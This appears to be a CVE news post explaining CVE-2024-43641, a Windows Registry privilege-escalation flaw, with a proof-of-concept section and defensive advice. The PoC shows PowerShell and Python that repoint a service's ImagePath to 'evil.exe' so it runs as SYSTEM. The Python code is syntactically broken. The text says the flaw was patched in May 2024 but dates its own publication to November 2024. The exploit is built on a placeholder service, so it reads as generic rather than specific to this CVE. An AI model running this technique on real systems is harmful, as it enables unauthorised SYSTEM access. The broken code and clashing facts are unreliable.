CVE CyberSecurity Database News

CVE-2024-43641 - Windows Registry Elevation of Privilege Vulnerability Explained

Poster -

In May 2024, Microsoft quietly patched an elevation of privilege (EoP) vulnerability in Windows, tracked as CVE-2024-43641. This Windows Registry oversight could let local attackers gain SYSTEM-level privileges—one of the most dangerous outcomes in Windows security. Here, we’ll break down everything you need to know about CVE-2024-43641, including technical details, exploit methods, and how you can stay secure.

What Is CVE-2024-43641?

CVE-2024-43641 affects how Windows handles permissions for certain registry keys. If exploited, it allows a regular user—or malware running as that user—to gain administrator or SYSTEM privileges.

Why is this bad? SYSTEM is the most powerful user in Windows. Anyone able to hijack this account can disable security tools, hide their malware, and do almost anything else on your computer.

Original Reference:
- Microsoft Security Response Center: CVE-2024-43641
- NIST NVD Entry: CVE-2024-43641

Technical Details

Registry Keys and Permissions:
Windows Registry keys keep critical system settings. Usually, the most sensitive keys (like those under HKEY_LOCAL_MACHINE\SYSTEM) are only editable by trusted services or administrators.

The issue with CVE-2024-43641 is that Windows incorrectly grants write permissions to a low-privilege group (usually "Users" or "Authenticated Users") for a sensitive registry key.

Proof of Concept (PoC) Walkthrough

Let’s look at a simplified version of how this might be exploited.

On a vulnerable system, you can use PowerShell to check key ACLs

$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\SomeService'
(Get-Acl $regPath).Access | Format-Table IdentityReference, RegistryRights, AccessControlType

If you see "BUILTIN\Users" with "FullControl," you have a vulnerable spot.

Attackers could change the ImagePath value to point to their own EXE

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SomeService' -Name 'ImagePath' -Value 'C:\Temp\evil.exe'

Step 3: Restart the Service

When the service restarts—sometimes just requiring a reboot—Windows will run evil.exe as SYSTEM.

Below is a demonstration using Python (requires pywin32)

import win32api
import win32con

key_path = r"SYSTEM\CurrentControlSet\Services\SomeService"
reg = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, key_path, , win32con.KEY_SET_VALUE)
win32api.RegSetValueEx(reg, "ImagePath", , win32con.REG_SZ, r"C:\Temp\evil.exe")
win32api.RegCloseKey(reg)

Upon restarting SomeService, your evil.exe will run as SYSTEM.

Immediate Defense

Update Windows
The best fix: install the latest Windows updates.

Use built-in tools to check registry permissions

Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' | 
  Format-Table Path, AccessToString -AutoSize

Look for entries where users have FullControl on service keys, then use Set-Acl to remove these permissions.

Watch for unexpected changes to ImagePath values in the registry.

- Use Sysinternals Autoruns to detect strange service startup paths.

Conclusion

CVE-2024-43641 is a reminder that simple permission mistakes can cause huge security problems. It shows the power of Windows Registry security—and why even one misconfigured ACL can lead to attacker paradise.

Stay safe:

Regularly audit privileged access.

References:
- Microsoft Patch Tuesday – May 2024
- CERT/CC Vulnerability Note VU#209295

Timeline

Published on: 11/12/2024 18:15:33 UTC
Last modified on: 11/21/2024 13:43:07 UTC